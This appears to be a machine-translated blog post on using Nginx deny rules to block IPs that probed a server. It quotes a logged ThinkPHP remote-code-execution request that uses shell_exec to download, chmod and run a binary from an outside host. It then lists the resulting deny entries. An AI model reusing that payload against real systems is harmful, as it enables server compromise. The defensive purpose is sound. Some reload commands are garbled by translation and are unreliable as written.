Use Nginx prevent malicious IP access

 

Find access to records has obvious characteristics, such as:

156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

Perhaps a vulnerability in a framework of open source, with the implementation of the method parameters to achieve the purpose download the specified file and then executed, because they are dangerous, so shell_exec such function is disabled by default in php.ini.

 

Not matching feature to find duplicate IP, write to the file:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

 

Editing a nginx configuration, added to the location visit:

$ cat blockips > /etc/nginx/conf.d/blockips.conf


location / {
include /etc/nginx/conf.d/blockips.conf
xxxx;
}

 

Edit blockips.conf, a line or "deny", end of the line plus ";"

%s/^/deny /g
%s/$/\;/g

 

Reload nginx, these IP access is 403:

Host mode # 
$ Nginx - S reload 
# Docker Mode 
$ Docker -compose -d --force-up the recreate Nginx

 

Accompanied by a malicious access IP:

deny 156.195.107.210;
deny 156.195.39.140;
deny 156.195.45.250;
deny 156.196.146.114;
deny 156.196.17.47;
deny 156.196.6.26;
deny 156.198.62.131;
deny 156.200.245.40;
deny 156.201.18.181;
deny 156.202.190.62;
deny 156.202.251.75;
deny 156.202.76.2;
deny 156.202.84.179;
deny 156.203.12.198;
deny 156.203.244.51;
deny 156.205.251.198;
deny 156.205.81.35;
deny 156.206.136.3;
deny 156.206.187.73;
deny 156.207.242.8;
deny 156.209.137.91;
deny 156.212.251.36;
deny 156.214.142.160;
deny 156.214.43.68;
deny 156.218.133.186;
deny 156.218.246.73;
deny 156.219.214.185;
deny 156.222.20.232;
deny 157.230.121.160;
deny 167.172.104.251;
deny 192.64.86.141;
deny 197.33.38.103;
deny 197.35.49.18;
deny 197.36.233.108;
deny 197.36.33.241;
deny 197.41.192.255;
deny 197.41.76.25;
deny 197.46.143.130;
deny 197.53.154.219;
deny 197.61.10.30;
deny 197.62.106.69;
deny 41.236.148.6;
deny 41.236.3.171;
deny 41.238.34.214;
deny 41.35.143.95;
deny 41.36.196.47;
deny 41.36.20.93;
deny 41.36.221.70;
deny 41.42.59.4;
deny 41.45.98.34;
deny 41.47.75.136;
deny 80.10.22.62;
deny 95.14.156.128;

 

Link:https://www.cnblogs.com/farwish/p/12080630.html

Guess you like

Origin www.cnblogs.com/farwish/p/12080630.html